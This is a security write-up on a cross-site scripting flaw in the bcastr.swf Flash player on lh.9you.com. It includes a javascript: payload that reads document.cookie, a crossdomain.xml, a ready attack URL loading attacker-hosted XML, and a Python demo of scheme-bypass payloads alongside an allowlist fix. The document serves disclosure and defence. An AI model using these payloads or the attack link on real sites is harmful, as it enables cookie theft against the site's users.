GetURL security issues.
Case: http://lh.9you.com/web_v3/bcastr.swf?bcastr_xml_url=xml/bcastr.xml

bcastr_xml_url is the parameter that tells the SWF where to load its external configuration or data file from (here an .xml file). Two ActionScript versions of this player are in circulation, and in both the function that opens a link comes down to:

    // as3.0
    navigateToURL(new URLRequest(parameter), "_self");
    // as2.0
    getURL(parameter, "_self");

The case here is the 2.0 version. parameter is the link to be opened. If it is "javascript:alert(1)", the JavaScript runs in the page that hosts the SWF when the link is opened; clicking has the same effect as <a href="javascript:alert(1)">click me to pop up 1</a>.

Now look at the XML configuration file. item_url is the address of the image to display, and link is the URL opened when the image is clicked; link is the controllable parameter mentioned above.

Decompile the SWF and search for code of that shape:

    getURL(bcastr_link_array[this.id], "_blank");

From the variable name, bcastr_link_array is the array built from the link attributes. Tracing it back:

    bcastr_link_array = new Array();
    ...
    while (i < item_total_num) {
        bcastr_flie_array.push(bcastr_xml.firstChild.childNodes[i].attributes.item_url);
        bcastr_title_array.push(bcastr_xml.firstChild.childNodes[i].attributes.itemtitle);
        bcastr_link_array.push(bcastr_xml.firstChild.childNodes[i].attributes.link);
        ++i;
    }

This confirms the guess: the loop copies the attribute values from the XML straight into the arrays, and nothing checks what scheme the link has before it reaches getURL.
Vulnerability exploitation: replace the link attribute in the XML with attack code, for example javascript:alert(document.cookie).

Cross-origin loading: the SWF runs from lh.9you.com but will be loading its XML from our server, so Flash Player first fetches crossdomain.xml from the root of our site and only allows the load if that policy grants access to the SWF's domain. We therefore place a crossdomain.xml at the root of our website:

    <?xml version="1.0"?>
    <cross-domain-policy>
        <allow-access-from domain="*.9you.com"/>
    </cross-domain-policy>

In this example the domain attribute is set to *.9you.com, which matches any 9you.com subdomain.

Final attack link:

    http://lh.9you.com/web_v3/bcastr.swf?bcastr_xml_url=http://127.0.0.1:8080/bcastr.xml

http://127.0.0.1:8080/bcastr.xml is the environment I have set up. Click an image in it.
Solution:
Validate the link URLs passed in from the XML with a regular expression (accept only http/https links), or restrict the SWF to loading XML files from its own site instead of from third-party websites. I will not go over swf files that have already been checked.
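As an added example (not code from the page or from the player's author), the following Python models both the exploitation step above and the two fixes in the Solution. It builds a constructed bcastr.xml of the kind served from 127.0.0.1:8080, mirrors the decompiled loop that fills bcastr_link_array, and then shows why the check must be an allowlist run on the decoded attribute values: a denylist grep on the raw file misses an entity-encoded javascript: scheme that any XML parser decodes before getURL sees it. The root element name bcastr, the item element name, the sample payloads, and the function names are assumptions for this example; the attribute names item_url, itemtitle and link come from the decompiled code. The real fix belongs in the SWF's ActionScript, since the attacker controls both the file and where it is loaded from; this is the logic, in a language the reader can run.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed stand-in for the attacker's bcastr.xml (not captured data).
# Element names are assumed; attribute names follow the decompiled loop.
MALICIOUS_BCASTR_XML = """<?xml version="1.0"?>
<bcastr>
  <item item_url="http://127.0.0.1:8080/1.jpg" itemtitle="a" link="javascript:alert(document.cookie)"/>
  <item item_url="http://127.0.0.1:8080/2.jpg" itemtitle="b" link="  JaVaScRiPt:alert(1)"/>
  <item item_url="http://127.0.0.1:8080/3.jpg" itemtitle="c" link="java&#x73;cript:alert(2)"/>
  <item item_url="http://127.0.0.1:8080/4.jpg" itemtitle="d" link="//127.0.0.1:8080/x.html"/>
  <item item_url="http://127.0.0.1:8080/5.jpg" itemtitle="e" link="http://lh.9you.com@127.0.0.1:8080/"/>
  <item item_url="http://127.0.0.1:8080/6.jpg" itemtitle="f" link="http://lh.9you.com/news/1.html"/>
</bcastr>
"""


def load_arrays(xml_text):
    """Mirror the decompiled loop: walk the root's children and copy the three
    attributes into parallel arrays exactly as the SWF does, with no checks."""
    root = ET.fromstring(xml_text)
    file_array, title_array, link_array = [], [], []
    for node in root:  # bcastr_xml.firstChild.childNodes[i]
        file_array.append(node.get("item_url", ""))
        title_array.append(node.get("itemtitle", ""))
        link_array.append(node.get("link", ""))
    return file_array, title_array, link_array


NAIVE_DENYLIST = re.compile(r"^\s*javascript:", re.IGNORECASE)


def naive_raw_check(xml_text):
    """A denylist applied to the raw file text (the quick grep-style fix).
    Returns the raw link values it would let through; note that the
    entity-encoded 'java&#x73;cript:' survives because it is not yet decoded."""
    raw_links = re.findall(r'link="([^"]*)"', xml_text)
    return [raw for raw in raw_links if not NAIVE_DENYLIST.match(raw)]


ALLOWED_SCHEMES = {"http", "https"}


def safe_link(url, allowed_hosts=("9you.com",)):
    """Allowlist check on the decoded attribute value. Returns the URL to hand
    to getURL, or None when the item should be dropped. Only absolute http(s)
    URLs on an allowed host (or its subdomains) pass, so javascript:, vbscript:,
    data:, protocol-relative and userinfo tricks are rejected by construction."""
    if not isinstance(url, str):
        return None
    candidate = url.strip()
    # Embedded control characters ("java\tscript:") are a classic way to slip a
    # scheme past a pattern check; refuse them outright.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in candidate):
        return None
    try:
        parts = urlsplit(candidate)
    except ValueError:  # e.g. malformed IPv6 literal
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return None
    host = (parts.hostname or "").lower()
    if not host or parts.username is not None:
        return None
    if not any(host == h or host.endswith("." + h) for h in allowed_hosts):
        return None
    return candidate


def filter_links(xml_text, allowed_hosts=("9you.com",)):
    """What the hardened loop should push into bcastr_link_array."""
    _, _, links = load_arrays(xml_text)
    return [safe_link(link, allowed_hosts) for link in links]


def xml_url_allowed(xml_url, swf_host="lh.9you.com"):
    """Second fix: accept bcastr_xml_url only as a relative path (resolved
    against the SWF's own origin) or an absolute http(s) URL on the SWF's host,
    so the parameter cannot point the player at an attacker's server."""
    candidate = xml_url.strip()
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return False
    if parts.scheme == "" and parts.netloc == "":
        return True  # e.g. xml/bcastr.xml
    return parts.scheme.lower() in ALLOWED_SCHEMES and (parts.hostname or "").lower() == swf_host


if __name__ == "__main__":
    print("raw-text denylist lets through:", naive_raw_check(MALICIOUS_BCASTR_XML))
    print("allowlist on decoded values keeps:", filter_links(MALICIOUS_BCASTR_XML))
    for u in ("xml/bcastr.xml", "http://127.0.0.1:8080/bcastr.xml", "//127.0.0.1:8080/bcastr.xml"):
        print(f"bcastr_xml_url={u!r}: allowed={xml_url_allowed(u)}")
```

Of the six constructed items only the plain http://lh.9you.com link survives the allowlist, while the raw-text denylist waves through the entity-encoded payload. Restricting bcastr_xml_url is the fix that removes the attacker's file from the picture; validating each link inside the SWF is what protects the player even when someone later finds another way to feed it XML.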